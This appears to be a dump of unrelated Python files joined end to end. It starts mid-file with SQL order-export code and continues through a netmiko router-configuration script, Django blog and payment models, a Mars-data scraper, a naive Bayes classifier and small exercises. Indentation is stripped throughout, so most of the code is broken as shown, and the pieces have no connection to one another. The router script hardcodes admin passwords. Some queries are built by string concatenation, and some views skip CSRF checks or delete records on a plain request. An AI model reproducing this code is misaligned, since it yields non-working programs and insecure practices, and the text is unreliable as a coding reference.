a.id 买家id,\
case a.region_id\
when '1' then '笛梦大区'\
when '2' then '环球大区'\
when '3' then '辉煌大区'\
when '4' then '聚米大区'\
when '5' then '聚星大区'\
when '6' then '口口大区'\
when '7' then '米苏大区'\
when '8' then '野狼大区'\
when '9' then '海纳百川大区'\
when '10' then '红红大区'\
when '11' then '熊熊大区'\
when '12' then '飞越大区'\
when '13' then '测试大区'\
else '其他' end as 进货人所属大区\
from uat_user.renren_distributor a,\
uat_order.rupt_purchase_order b,\
uat_order.rupt_purchase_order_item c\
where a.id = b.source_id and b.purchase_order_no = c.purchase_order_no and b.pay_type = 2 and b.submit_time >= '2020-07-28 00:00:00' and b.is_transfer = 0;"
noresult = conn.ExecQuery(no_forward)
for i in noresult:
rows.append(i)
is_forward = "select b.purchase_order_no 订单编号,\
case b.status\
when '2' then '待付款'\
when '3' then '待审核'\
when '4' then '审核失败'\
when '6' then '代发货'\
when '7' then '调货中'\
when '8' then '待收货'\
when '9' then '完成'\
when '10' then '已取消'\
else '其他' end as 订单状态,\
b.submit_time 订单提交时间,\
case b.target_type \
when '1' then '总部' \
when '2' then '代理'\
else '其他' end as 出货人类型,\
b.transfer_to 总部订单号,\
c.title 商品名称,\
c.goods_id 商品id,\
c.sku_desc 商品描述,\
c.sku_id skuid,\
c.num 单品购买数量,\
c.price 进货单价,\
c.total_fee 总金额,\
b.payment 实际付款总额,\
c.post_fee 运费,\
a.NAME 代理姓名,\
a.auth_code 授权码,\
case a.level_id\
when '1' then '分公司'\
when '2' then '合伙人'\
when '3' then '官方'\
when '4' then '省代'\
when '5' then '市代'\
when '6' then '会员'\
else '其他' end as 代理等级,\
a.id 买家id,\
case a.region_id\
when '1' then '笛梦大区'\
when '2' then '环球大区'\
when '3' then '辉煌大区'\
when '4' then '聚米大区'\
when '5' then '聚星大区'\
when '6' then '口口大区'\
when '7' then '米苏大区'\
when '8' then '野狼大区'\
when '9' then '海纳百川大区'\
when '10' then '红红大区'\
when '11' then '熊熊大区'\
when '12' then '飞越大区'\
when '13' then '测试大区'\
else '其他' end as 进货人所属大区\
from \
uat_user.renren_distributor a,\
uat_order.rupt_purchase_order b,\
uat_order.rupt_purchase_order_item c\
where a.id = b.source_id \
and b.purchase_order_no = c.purchase_order_no \
and b.pay_type = 2 and b.submit_time >= '2020-07-28 00:00:00' and b.target_type = 2 and b.is_transfer = 1"
isresult = conn.ExecQuery(is_forward)
for i in isresult:
up1_level = i['总部订单号']
print(up1_level)
check_sql = "select purchase_order_no,target_type,transfer_to from uat_order.rupt_purchase_order where purchase_order_no = \'"+up1_level+"\'"
check_result = conn.ExecQuery(check_sql)
print(check_result)
up1_targettype = check_result[0]['target_type']
if up1_targettype == 1:
rows.append(i)
else:
continue
while up1_targettype == 2:
check_sql_1 = "select target_type,transfer_to from uat_order.rupt_purchase_order where purchase_order_no = \'"+up1_level+"\'"
check_result_1 = conn.ExecQuery(check_sql_1)
up1_level = check_result_1['transfer_to']
up1_targettype = check_result_1['target_type']
if up1_targettype == 1:
i['总部订单号'] = up1_level
rows.append(i)
break
isforward_csv = "D:\\workpalce\\csv_file\\"+now_time+".csv"
headers = ['订单编号','订单状态','订单提交时间','出货人类型','总部订单号','商品名称','商品id','商品描述','skuid','单品购买数量','进货单价','总金额',\
'实际付款总额','运费','代理姓名','授权码','代理等级','买家id','进货人所属大区']
with open(isforward_csv,'w',newline='') as f:
f_csv = csv.DictWriter(f,headers)
f_csv.writeheader()
f_csv.writerows(rows)
f.close()
return
def main():
#noForward()
isForward()
return
if __name__ == '__main__':
main() |
from abc import abstractmethod
class Detector(object):
def __init__(self, data_train, data_test, labels_train, extra_parameter):
assert len(data_train) == len(labels_train), "Mismatch size"
self.data_train = data_train
self.data_test = data_test
self.labels_train = labels_train
self.extra_parameter = extra_parameter
@abstractmethod
def test_detector(self):
raise NotImplementedError("Not implemented test_detector method for detector")
@abstractmethod
def extract_features(self):
raise NotImplementedError("Not implemented extract_features method for detector") |
#!/usr/bin/python
from matplotlib import pyplot
if __name__ == '__main__':
with open('walk-record.txt') as f:
lines = f.readlines()
score = [float(k) for k in [_[:-1].split(',')[-1] for _ in lines]]
pyplot.plot(score, '.')
pyplot.title('walk score as times')
pyplot.xlabel('try times')
pyplot.ylabel('walk distance')
best = [max(score[:i+1]) for i, e in enumerate(score)]
pyplot.plot(best, 'r')
pyplot.savefig('scores.png')
pyplot.show()
|
APPINFO_JSON = {u'sdkVersion': u'3', u'uuid': u'b3578af5-8a89-4a1d-9437-060a0b481c9e', u'appKeys': {u'AppKeyReady': 0, u'AppKeyUrl': 2}, u'companyName': u'Andrea Cerra', u'enableMultiJS': True, u'versionLabel': u'1.0', u'targetPlatforms': [u'aplite', u'basalt', u'chalk'], u'longName': u'PebbleHttp List', u'shortName': u'PebbleHttp List', u'watchapp': {u'watchface': False}, u'resources': {u'media': []}}
BINDIR = '/usr/local/bin'
DEFINES = ['RELEASE']
LIBDIR = '/usr/local/lib'
PBW_NAME = 'Pebble.pbw'
PEBBLE_SDK_COMMON = '/Users/Andrea/Library/Application Support/Pebble SDK/SDKs/current/sdk-core/pebble/common'
PEBBLE_SDK_ROOT = '/Users/Andrea/Library/Application Support/Pebble SDK/SDKs/current/sdk-core/pebble'
PREFIX = '/usr/local'
RESOURCES_JSON = []
TARGET_PLATFORMS = ['chalk', 'basalt', 'aplite']
TIMESTAMP = 1465050134
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
{
'name': "SO - Product Price Check",
'version': '10.0.1.0.0',
'category': 'Sales Management',
'description': """
This module restricts a user from confirming a Sale Order/Quotation
if it contains products having sale price zero.
""",
'license': 'AGPL-3',
'author': "Serpent Consulting Services Pvt. Ltd.",
'website': 'http://www.serpentcs.com',
'depends': ['sale'],
'images': ['static/description/PriceCheck.png'],
'installable': True,
'auto_install': False,
}
|
class Solution:
def twoSum(self, nums, target):
"""
:type nums: List[int]
:type target: int
:rtype: List[int]
"""
for i in range(len(nums)):
if i != len(nums):
for j in range(i+1, len(nums)):
if nums[i]+nums[j] == target:
return [i, j]
def main():
print(Solution().twoSum([2, 7, 11, 15], 9))
print(Solution().twoSum((-3, 4, 3, 90), 0))
if __name__ == "__main__":
main()
|
from definitions import PIS_OUTPUT_INTERACTIONS
import logging
import json
import requests
import gzip
import pandas as pd
import re
from io import BytesIO
from .DownloadResource import DownloadResource
import python_jsonschema_objects as pjo
from .common import replace_suffix
logger = logging.getLogger(__name__)
class StringInteractions(object):
"""
main interface of the StringInteractions module.
* Manages the flow of accessing data from various sources + mapping
* Manages the formatting of the resulting data accomodating the json schema
"""
def __init__(self, yaml_dict):
self.download = DownloadResource(PIS_OUTPUT_INTERACTIONS)
self.gs_output_dir = yaml_dict.gs_output_dir
self.output_folder = PIS_OUTPUT_INTERACTIONS
self.yaml = yaml_dict
self.string_url = yaml_dict.string_info.uri
self.string_info = yaml_dict.string_info
self.ensembl_gtf_url = yaml_dict.string_info.additional_resouces.ensembl_ftp
self.network_json_schema_url = yaml_dict.string_info.additional_resouces.network_json_schema.url
self.output_string = yaml_dict.string_info.output_string
self.output_protein_mapping = yaml_dict.string_info.additional_resouces.ensembl_ftp.output_protein_mapping
self.list_files_downloaded = {}
def getStringResources(self):
# Fetch string network data and generate evidence json:
ensembl_protein_mapping = self.get_ensembl_protein_mapping()
self.list_files_downloaded[ensembl_protein_mapping] = {'resource': self.ensembl_gtf_url.resource,
'gs_output_dir': self.gs_output_dir }
string_file = self.download.execute_download(self.string_info)
self.list_files_downloaded[string_file] = {'resource': self.yaml.string_info.resource,
'gs_output_dir': self.gs_output_dir }
return self.list_files_downloaded
def get_ensembl_protein_mapping(self):
ensembl_file = self.download.ftp_download(self.ensembl_gtf_url)
return ensembl_file
|
# -*- coding: utf-8 -*-
"""
Created on Sat Dec 22 21:10:18 2018
@author: Gehad
"""
import pandas as pd
from itertools import combinations
def calc_p_class(trainingData,Class):
count=0
for i in range(0,len(trainingData)):
for j in range(0,7):
if trainingData[i][j]==Class:
count=count+1
prop=count/len(trainingData)
return prop
def calc_p_feature_class(trainingData,Class,feature,fno):
count=0
counter=1
for i in range(0,len(trainingData)):
for j in range(0,7):
if trainingData[i][j]==Class:
count=count+1
if trainingData[i][j]==Class and trainingData[i][fno]==feature:
counter=counter+1
prop=counter/count
return prop
def calssifier(trainingData,test):
p_unacc=calc_p_class(trainingData,'unacc')
p_acc=calc_p_class(trainingData,'acc')
p_good=calc_p_class(trainingData,'good')
p_vgood=calc_p_class(trainingData,'vgood')
cls=[p_unacc,p_acc,p_good,p_vgood]
#print(p_unacc)
#print(p_acc)
#print(p_good)
#print(p_vgood)
classes=['unacc', 'acc', 'good', 'vgood']
feature1=['vhigh', 'high', 'med', 'low']
feature2=['vhigh', 'high', 'med', 'low']
feature3=['2','3', '4', '5more']
feature4=['2','4','more']
feature5=['small', 'med', 'big']
feature6=['low', 'med', 'high']
#price feature fno=0
p_price=[]
#print("price feature")
for c in classes:
for f in feature1:
#print(c,f)
p_price.append((c,f,calc_p_feature_class(trainingData,c,f,0)))
#mprice feature fno=1
p_mprice=[]
#print("mantience price feature")
for c in classes:
for f in feature2:
#print(c,f)
p_mprice.append((c,f,calc_p_feature_class(trainingData,c,f,1)))
#no. of doors feature fno=2
p_doorsnum=[]
#print("no. of doors feature")
for c in classes:
for f in feature3:
#print(c,f)
p_doorsnum.append((c,f,calc_p_feature_class(trainingData,c,f,2)))
#Capacity in terms of persons to carry fno=3
p_capacity=[]
#print("Capacity in terms of persons to carry")
for c in classes:
for f in feature4:
#print(c,f)
p_capacity.append((c,f,calc_p_feature_class(trainingData,c,f,3)))
#the size of luggage boot
p_lug=[]
#print("the size of luggage boot")
for c in classes:
for f in feature5:
#print(c,f)
p_lug.append((c,f,calc_p_feature_class(trainingData,c,f,4)))
#Estimated safety of the car
p_safty=[]
#print("Estimated safety of the car")
for c in classes:
for f in feature6:
#print(c,f)
p_safty.append((c,f,calc_p_feature_class(trainingData,c,f,5)))
#print(p_price)
#print(p_mprice)
#print(p_doorsnum)
#print(p_capacity)
#print(p_lug)
#print(p_safty)
#TESTING
p_props=[]
for c in classes:
for x,y,z in p_price:
if x==c and y==test[0]:
p_props.append(z)
#print(p_props)
mp_props=[]
for c in classes:
for x,y,z in p_mprice:
if x==c and y==test[1]:
mp_props.append(z)
#print(mp_props)
d_props=[]
for c in classes:
for x,y,z in p_doorsnum:
if x==c and y==test[2]:
d_props.append(z)
#print(d_props)
c_props=[]
for c in classes:
for x,y,z in p_capacity:
if x==c and y==test[3]:
c_props.append(z)
#print(c_props)
l_props=[]
for c in classes:
for x,y,z in p_lug:
if x==c and y==test[4]:
l_props.append(z)
#print(l_props)
s_props=[]
for c in classes:
for x,y,z in p_safty:
if x==c and y==test[5]:
s_props.append(z)
#print(s_props)
res=[]
for i in range(0,4):
r=cls[i]*p_props[i]*mp_props[i]*d_props[i]*c_props[i]*l_props[i]*s_props[i]
res.append(r)
#print(res)
res_cls=(res.index(max(res)))
return classes[res_cls]
def calc_accurcy(test,orgTest):
count=0
for i in range (0,len(test)):
if test[i][6]==orgTest[i][6]:
count=count+1
return (count/len(orgTest))*100
def main():
#loading the dataset and split it
trainingData=list()
testData=list()
dataSet=pd.read_csv("car.data.csv")
dataSetLen=len(dataSet)
trainingDataSize=int(.75*dataSetLen)
for i in range(0,trainingDataSize):
trainingData.append([dataSet.values[i,j] for j in range(0,7)])
for i in range (trainingDataSize,dataSetLen):
testData.append([dataSet.values[i,j] for j in range(0,6)])
#call classifier
for test_tuple in testData:
cls=calssifier(trainingData,test_tuple)
test_tuple.append(cls)
print(testData)
#clac accurcy
originalTest=[]
for i in range (trainingDataSize,dataSetLen):
originalTest.append([dataSet.values[i,j] for j in range(0,7)])
accurcy=calc_accurcy(testData,originalTest)
print("Classifier accurcy:",round(accurcy,2),"%")
if __name__ =='__main__':
main()
|
from netmiko import ConnectHandler
from netmiko.ssh_exception import NetMikoTimeoutException
from netmiko.ssh_exception import AuthenticationException
from paramiko.ssh_exception import SSHException
import sys
host1 = {
'device_type': 'cisco_ios',
'ip': '10.4.0.17',
'username': 'Admin',
'password': 'NterOne1!',
}
host2 = {
'device_type': 'cisco_ios',
'ip': '10.4.1.1',
'username': 'Admin',
'password': 'NterOne1!',
}
host3 = {
'device_type': 'cisco_ios',
'ip': '10.4.3.1',
'username': 'Admin',
'password': 'NterOne1!',
}
#routers =[host1, host2, host3]
routers =[host3]
for target in routers:
try:
net_connect = ConnectHandler(**target)
print(target)
except (AuthenticationException):
print ('\n' + "*"*80)
print ('Authentication Failure: ' + str(target))
print ("*"*80)
continue
except (NetMikoTimeoutException):
print ('\n' + "*"*80)
print ('Timeout to device: ' + str(target))
print ("*"*80)
continue
except (SSHException):
print ('\n' + "*"*80)
print ('SSH might not be enabled: ' + str(target))
print ("*"*80)
continue
except (EOFError):
print ('\n' + "*"*80)
print ('End of attempting device: ' + str(target))
print ("*"*80)
continue
except:
print ('Some other error: ' + str(target) + str(sys.exc_info()))
loopback11 = "11.4."+target['ip'].split('.')[2]+'.1'
loopbackcmd = 'ip address '+ loopback11+ ' 255.255.255.0'
config_commands = ['int loop 11', loopbackcmd]
output = net_connect.send_config_set(config_commands)
print (output)
print ("-"*20)
output = net_connect.send_command('show ip int brief')
print (output)
print ("="*80)
net_connect.disconnect()
|
import os
import re
import logging
from lxml import etree
from blogilainen.plugins import BasePlugin
class Plugin(BasePlugin):
def run(self, source, resource):
target_meta = etree.Element('target-meta')
for ext,t in source.targets.iteritems():
target = etree.Element('target', type=ext)
# make sure out path is separated by '/'
out_path = re.sub(os.sep, '/', t.relative_path)
target.append(etree.Element('meta', name='out-path', content=out_path))
target.append(etree.Element('meta', name='basename', content=t.basename))
target.append(etree.Element('meta', name='ext', content=t.ext))
target.append(etree.Element('meta', name='out-file', content=t.out_file))
target.append(etree.Element('meta', name='out', content=t.out_url))
target_meta.append(target)
resource.append(target_meta)
return resource
|
# -*- coding: utf-8 -*-
from django.db import models
from django.conf import settings
from django.core.urlresolvers import reverse_lazy
class Entry(models.Model):
name = models.CharField(verbose_name=u'Заголовок', max_length=255)
date_create = models.DateTimeField(verbose_name=u'Дата создания',
auto_now_add=True)
description = models.TextField(verbose_name=u'Описание')
text = models.TextField(verbose_name=u'Текст')
user = models.ForeignKey(settings.AUTH_USER_MODEL)
class Meta:
app_label = 'blog'
ordering = ['-date_create']
verbose_name = u'Запись блога'
verbose_name_plural = u'Записи блога'
def __unicode__(self):
return self.name
def get_absolute_url(self):
return reverse_lazy('blog:entry', kwargs={'pk': self.id})
class UserFeed(models.Model):
# Подписка пользователя
user = models.ForeignKey(settings.AUTH_USER_MODEL,
verbose_name=u'Кто подписан',
related_name='user_feed')
feed = models.ForeignKey(settings.AUTH_USER_MODEL,
verbose_name=u'На кого подписан',
related_name='user_readers')
class Meta:
app_label = 'blog'
unique_together = (('user', 'feed'),)
class ReadEntry(models.Model):
# Прочтенные посты
user = models.ForeignKey(settings.AUTH_USER_MODEL)
autor = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='autor')
entry = models.ForeignKey(Entry)
class Meta:
app_label = 'blog'
unique_together = (('user', 'entry'),)
|
"""
ASGI entrypoint. Configures Django and then runs the application
defined in the ASGI_APPLICATION setting.
"""
import os
# Fetch Django ASGI application early to ensure AppRegistry is populated
# before importing consumers and AuthMiddlewareStack that may import ORM
# models.
from django.core.asgi import get_asgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "daphne_brain.settings")
django_asgi_app = get_asgi_application()
from channels.auth import AuthMiddlewareStack
from channels.routing import ProtocolTypeRouter, URLRouter
from daphne_brain.routing import ws_routes
application = ProtocolTypeRouter({
"http": django_asgi_app,
"websocket": AuthMiddlewareStack(
URLRouter(ws_routes),
),
})
|
# -*- coding: cp936 -*-
# 绪论案例:Boston房价
# %matplotlib inline
import matplotlib.pyplot as plt
from sklearn import datasets
from sklearn.feature_selection import SelectKBest,f_regression
from sklearn.linear_model import LinearRegression
from sklearn.svm import SVR
from sklearn.ensemble import RandomForestRegressor
boston_dataset = datasets.load_boston()
X_full = boston_dataset.data
Y = boston_dataset.target
print(X_full.shape) # (506, 13)
print(Y.shape) # (506,)
print(boston_dataset.DESCR)
# 特征选择
selector = SelectKBest(f_regression,k=1)
selector.fit(X_full,Y)
X = X_full[:,selector.get_support()]
print(X.shape) # (506, 1)
plt.scatter(X,Y,color='black')
plt.show()
# 线性回归
regressor = LinearRegression(normalize=True)
regressor.fit(X,Y)
plt.scatter(X,Y,color='black')
plt.plot(X,regressor.predict(X),color='red',linewidth=3)
plt.show()
# SVM
regressor = SVR()
regressor.fit(X,Y)
plt.scatter(X,Y,color='black')
plt.scatter(X,regressor.predict(X),color='red',linewidth=3)
plt.show()
# Random Forest回归
regressor = RandomForestRegressor()
regressor.fit(X,Y)
plt.scatter(X,Y,color='black')
plt.scatter(X,regressor.predict(X),color='red',linewidth=3)
plt.show() |
# Dependencies
from bs4 import BeautifulSoup
import requests
from splinter import Browser
from selenium import webdriver
import pandas as pd
import time
def init_browser():
executable_path = {"executable_path": "/usr/local/bin/chromedriver"}
return Browser("chrome", **executable_path, headless=False)
def scrape():
browser = init_browser()
# Create a dictionary to store the datas
mars_dict = {}
#### NASA MARS NEWS ####
news_url = 'https://mars.nasa.gov/news/'
browser.visit(news_url)
news_html = browser.html
news_soup = BeautifulSoup(news_html, 'lxml')
news_title = news_soup.find("div", class_= "content_title").text
news_paragraph = news_soup.find("div", class_ = "article_teaser_body").text
mars_dict['news_title'] = news_title
mars_dict['news_paragraph'] = news_paragraph
#### JPL MARS SPACE IMAGES ####
image_url = "https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars"
browser.visit(image_url)
browser.click_link_by_partial_text('FULL IMAGE')
time.sleep(2)
browser.click_link_by_partial_text('more info')
image_html = browser.html
image_soup = BeautifulSoup(image_html,'lxml')
jpl_image = image_soup.find('figure', class_='lede').a['href']
featured_image_url = (f'https://www.jpl.nasa.gov{jpl_image}')
mars_dict['featured_image_url'] = featured_image_url
#### MARS WEATHER ####
tweet_weather_url = 'https://twitter.com/marswxreport?lang=en'
browser.visit(tweet_weather_url)
tweet_html = browser.html
weather_soup = BeautifulSoup(tweet_html, 'lxml')
latest_weather = weather_soup.find('div', class_= 'js-tweet-text-container')
mars_weather = latest_weather.find('p', class_= 'TweetTextSize').text
mars_dict['mars_weather'] = mars_weather
#### MARS FACTS ####
mars_fact_url = 'https://space-facts.com/mars'
browser.visit(mars_fact_url)
mars_fact_html = browser.html
mars_soup = BeautifulSoup(mars_fact_html, 'lxml')
tables = pd.read_html(mars_fact_url)
mars_fact_df = tables[1]
mars_final_df = mars_fact_df.rename(columns={0:"Parameters",1:"Values"})
mars_final_df = mars_fact_df.to_html(header = False, index = False)
mars_final_df.replace('\n', '')
mars_dict['mars_final_df'] = mars_final_df
#### MARS HEMISHPERES ####
hemisphere_url = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars'
browser.visit(hemisphere_url)
hemisphere_html = browser.html
hemisphere_soup = BeautifulSoup(hemisphere_html, 'lxml')
base_url ="https://astrogeology.usgs.gov"
image_list = hemisphere_soup.find_all('div', class_='item')
# Create list to store dictionaries of data
hemisphere_image_urls = []
# Loop through each hemisphere and click on link to find large resolution image url
for image in image_list:
hemisphere_dict = {}
href = image.find('a', class_='itemLink product-item')
link = base_url + href['href']
browser.visit(link)
time.sleep(2)
hemisphere_html2 = browser.html
hemisphere_soup2 = BeautifulSoup(hemisphere_html2, 'lxml')
img_title = hemisphere_soup2.find('div', class_='content').find('h2', class_='title').text
hemisphere_dict['title'] = img_title
img_url = hemisphere_soup2.find('div', class_='downloads').find('a')['href']
hemisphere_dict['url_img'] = img_url
# Append dictionary to list
hemisphere_image_urls.append(hemisphere_dict)
mars_dict['hemisphere_image_urls'] = hemisphere_image_urls
return mars_dict
|
import random
def calcBayes(priorA, probBifA, probB):
"""priorA:A独立于B时的初始概率估计值
probBifA:A为真时,B的概率估计值
probB:B的概率估计值
返回priorA*probBifA/probB"""
return priorA*probBifA/probB
# priorA = 1/3
priorA = 0.9
prob6ifA = 1/5
prob6 = (1/5 + 1/6 + 1/7)/3
# postA = calcBayes(priorA, prob6ifA, prob6)
# print('Probability of type A =', round(postA, 4))
# postA = calcBayes(postA, prob6ifA, prob6)
# print('Probability of type A =', round(postA, 4))
# postA = calcBayes(priorA, 1 - prob6ifA, 1 - prob6)
# print('Probability of type A =', round(postA, 4))
# postA = calcBayes(postA, 1 - prob6ifA, 1 - prob6)
# print('Probability of type A =', round(postA, 4))
numRolls = 200
postA = priorA
for i in range(numRolls+1):
if i%(numRolls//10) == 0:
print('After', i, 'rolls. Probability of type A =',
round(postA, 4))
isSix = random.random() <= 1/7 #because die of type C
if isSix:
postA = calcBayes(postA, prob6ifA, prob6)
else:
postA = calcBayes(postA, 1 - prob6ifA, 1 - prob6) |
from sardana.macroserver.macro import Macro, macro, Type
@macro()
def altOn(self):
"""Macro altOn"""
acqConf = self.getEnv('acqConf')
acqConf['altOn'] = True
self.setEnv('acqConf', acqConf)
self.info('switching altOn')
@macro()
def altOff(self):
"""Macro altOff"""
acqConf = self.getEnv('acqConf')
acqConf['altOn'] = False
self.setEnv('acqConf', acqConf)
self.info('switching altOff')
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import traceback
from .auth import braintree
from .managers import CustomerManager
# from .tasks import send_funds
from model_utils.models import TimeStampedModel
from delorean import Delorean
from jsonfield.fields import JSONField
from django.conf import settings
from django.utils.encoding import python_2_unicode_compatible
from django.utils import timezone
from django.db import models
from django_extensions.db.fields.encrypted import EncryptedCharField
# def dwolla_charge(sub):
# # Clear out any previous session
# DWOLLA_GATE.start_gateway_session()
# # Add a product to the purchase order
# # DWOLLA_GATE.add_gateway_product(str(sub.customer), float(sub.amount))
# DWOLLA_GATE.add_gateway_product('Devote.io subscription', 21.00)
# # Generate a checkout URL; pass in the recipient's Dwolla ID
# # url = DWOLLA_GATE.get_gateway_URL(str(sub.customer))
# url = DWOLLA_GATE.get_gateway_URL(DWOLLA_ACCOUNT['user_id'])
# return url
# def create_oauth_request_url():
# """ Send users to this url to authorize us """
# redirect_uri = "https://www.back2ursite.com/return"
# scope = "send|balance|funding|transactions|accountinfofull"
# authUrl = DWOLLA_APP.init_oauth_url(redirect_uri, scope)
# return authUrl
class BraintreeObject(TimeStampedModel):
braintree_id = models.CharField(max_length=50)
class Meta:
abstract = True
@python_2_unicode_compatible
class Customer(BraintreeObject):
user = models.OneToOneField(getattr(settings, 'AUTH_USER_MODEL', 'auth.User'),
null=True, related_name='bt_customer')
token = models.CharField(max_length=100, null=True, blank=True)
refresh_token = models.CharField(max_length=100, null=True, blank=True)
pin = EncryptedCharField(max_length=100, null=True, blank=True)
funds_source = models.CharField(max_length=50, blank=True, null=True)
card_fingerprint = models.CharField(max_length=200, blank=True)
card_last_4 = models.CharField(max_length=4, blank=True)
card_kind = models.CharField(max_length=50, blank=True)
date_purged = models.DateTimeField(null=True, editable=False)
token_expiration = models.DateTimeField(null=True)
objects = CustomerManager()
def __str__(self):
return unicode(self.user)
@classmethod
def get_or_create(cls, user):
try:
return Customer.objects.get(user=user), False
except Customer.DoesNotExist:
return cls.create(user), True
@classmethod
def create(cls, user, token=None):
cus = Customer.objects.create(user=user)
return cus
def get_token(self):
return None
# if self.token_expiration <= Delorean().datetime:
# token = self.update_tokens()
# return token
def update_token(self, token):
if self.braintree_id:
braintree.Customer.update(self.braintree_id,
{"payment_method_nonce": token})
else:
result = braintree.Customer.create({"email": self.user.email,
"payment_method_nonce": token})
self.braintree_id = result.customer.id
self.token = token
self.save(update_fields=['braintree_id', 'token'])
return True
def get_paypal_token(self):
cus = braintree.Customer.find(self.braintree_id)
return cus.paypal_accounts[0].token
def charge_paypal(self, amount, token=None):
""" amount is a string representation of the dollar amount """
token = self.get_paypal_token()
result = braintree.Transaction.sale({"amount": amount,
"payment_method_token": token,
"options": {
"submit_for_settlement": True
}})
if result.is_success:
return result.transaction.id
else:
return result.message
class CurrentSubscription(TimeStampedModel):
STATUS_TRIALING = "trialing"
STATUS_ACTIVE = "active"
STATUS_PAST_DUE = "past_due"
STATUS_CANCELLED = "canceled"
STATUS_UNPAID = "unpaid"
customer = models.OneToOneField(
Customer,
related_name="current_subscription",
null=True
)
plan = models.CharField(max_length=100)
quantity = models.IntegerField()
start = models.DateTimeField()
# trialing, active, past_due, canceled, or unpaid
# In progress of moving it to choices field
status = models.CharField(max_length=25)
cancel_at_period_end = models.BooleanField(default=False)
canceled_at = models.DateTimeField(null=True, blank=True)
current_period_end = models.DateTimeField(null=True)
current_period_start = models.DateTimeField(null=True)
ended_at = models.DateTimeField(null=True, blank=True)
trial_end = models.DateTimeField(null=True, blank=True)
trial_start = models.DateTimeField(null=True, blank=True)
amount = models.DecimalField(decimal_places=2, max_digits=7)
def status_display(self):
return self.status.replace("_", " ").title()
def is_period_current(self):
if self.current_period_end is None:
return False
return self.current_period_end > timezone.now()
def is_status_current(self):
return self.status in [self.STATUS_TRIALING, self.STATUS_ACTIVE]
"""
Status when customer canceled their latest subscription, one that does not prorate,
and therefore has a temporary active subscription until period end.
"""
def is_status_temporarily_current(self):
return self.canceled_at and self.start < self.canceled_at and self.cancel_at_period_end
def is_valid(self):
if not self.is_status_current():
return False
if self.cancel_at_period_end and not self.is_period_current():
return False
return True
def create_charge(self):
url = dwolla_charge(self)
return url
def get_plan(self):
return Plan.objects.get(name=str(self.customer.user))
def charge_subscription(self):
token = self.customer.get_token()
cus = self.customer
metadata = {'recur': 'recur'}
# Need to do something here...
# send_funds.delay(token, DWOLLA_ACCOUNT['user_id'],
# float(self.amount), cus.pin,
# "Devote.io monthly subscription",
# metadata=metadata)
@classmethod
def get_or_create(cls, customer, amount=0):
try:
return CurrentSubscription.objects.get(customer=customer), False
except CurrentSubscription.DoesNotExist:
return cls.create(customer, amount=amount), True
@classmethod
def create(cls, customer, amount=0):
end = Delorean().next_month().truncate("month").datetime
current_sub = CurrentSubscription.objects.create(customer=customer, quantity=1,
start=timezone.now(), status="active",
current_period_end=end, amount=amount,
current_period_start=timezone.now())
return current_sub
def update(self, amount):
self.amount = amount
self.save(update_fields=['amount'])
CURRENCIES = (
('usd', 'U.S. Dollars',),
('gbp', 'Pounds (GBP)',),
('eur', 'Euros',))
INTERVALS = (
('week', 'Week',),
('month', 'Month',),
('year', 'Year',))
|
import json
from django.contrib.auth import get_user_model
from django.core.cache import cache
from django.http import HttpResponse
from django.shortcuts import get_object_or_404
from django.utils.decorators import method_decorator
from django.views.decorators.csrf import csrf_exempt
from rest_framework import viewsets
from api.serializers import UserSerializer
from core.models import Game
from online.status import CACHE_PREFIX_USER, OnlineStatus, refresh_user, refresh_users_list, CACHE_USERS
User = get_user_model()
class OnlineViewSet(viewsets.ViewSet):
@csrf_exempt
def dispatch(self, *args, **kwargs):
return super(OnlineViewSet, self).dispatch(*args, **kwargs)
def list(self, request, game_id):
game = get_object_or_404(Game, pk=game_id)
raw = cache.get(CACHE_USERS % game.id) or []
resp = []
for r in raw:
resp.append({'user': {'id': r.user.id, 'username': r.user.username, 'email': r.user.email},
'game': r.game.id,
'status': r.status,
'seen': r.seen,
'ip': r.ip,
'session': r.session,
})
def date_handler(obj):
return obj.isoformat() if hasattr(obj, 'isoformat') else obj
return HttpResponse(json.dumps(resp, default=date_handler), content_type='application/json')
class OnlineListPingViewSet(viewsets.ViewSet):
@csrf_exempt
def dispatch(self, *args, **kwargs):
return super(OnlineListPingViewSet, self).dispatch(*args, **kwargs)
def create(self, request, game_id):
game = get_object_or_404(Game, pk=self.kwargs.get('game_id'))
onlinestatus = cache.get(CACHE_PREFIX_USER % (request.user.pk, game.id))
if not onlinestatus:
onlinestatus = OnlineStatus(request, game)
refresh_user(request, game)
refresh_users_list(updated=onlinestatus, game_id=game.id)
return HttpResponse('ok') |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import render,redirect,HttpResponse
from models import *
def index(request):
return render(request,'users/index.html')
def show(request):
context = {"User":User.objects.all()}
print User.objects.all()
return render(request,'users/show.html',context)
def process(request):
request.session["err"] = ""
if request.method=="POST":
Validate().check(request)
if Validate().check(request) == True:
Validate().create(request)
redirect('/show')
return redirect('/show')
def processids(request,ids):
request.session["err"] = ""
if request.POST["name"] == "":
return redirect('/edit/{}'.format(ids))
if request.POST["email"] == "":
return redirect('/edit/{}'.format(ids))
Validate().update(request,ids)
return redirect('/show')
def edit(request,ids):
context = {"User":User.objects.get(id=ids)}
return render(request,"users/edit.html",context)
def delete(request,ids):
user = User.objects.get(id=ids)
user.delete()
return redirect('/show')
def user(request,ids):
context = {"User":User.objects.get(id=ids)}
return render(request,'users/user.html',context)
# Create your views here.
|
def insertionSort(alist):
for index in range(1,len(alist)):
currentvalue = alist[index]
position = index
while position>0 and alist[position-1]>currentvalue:
alist[position]=alist[position-1]
position = position-1
alist[position]=currentvalue
print " ".join(map(str, alist))
m = input()
ar = [int(i) for i in raw_input().strip().split()]
insertionSort(ar) |
import torch
import torch.utils.data
import torchvision
import numpy as np
def make_weights_for_balanced_classes(labels,classes):
labels = np.array(labels)
#print(labels)
weights=[]
outs=[]
weight = 1./ len(labels)
for ic in range(classes):
weights.append(weight/(labels==ic).sum())
for sim in labels:
#print(sim)
outs.append(weights[sim])
return torch.DoubleTensor(outs)
|
'''
2573번
빙산
'''
import sys
from collections import deque
input=sys.stdin.readline
n, m=map(int, input().split())
board=[]
for _ in range(n):
board.append(list(map(int, input().split())))
q=deque()
q2=deque()
for y in range(n):
for x in range(m):
if board[y][x]!=0:
q.append((x,y))
year=0
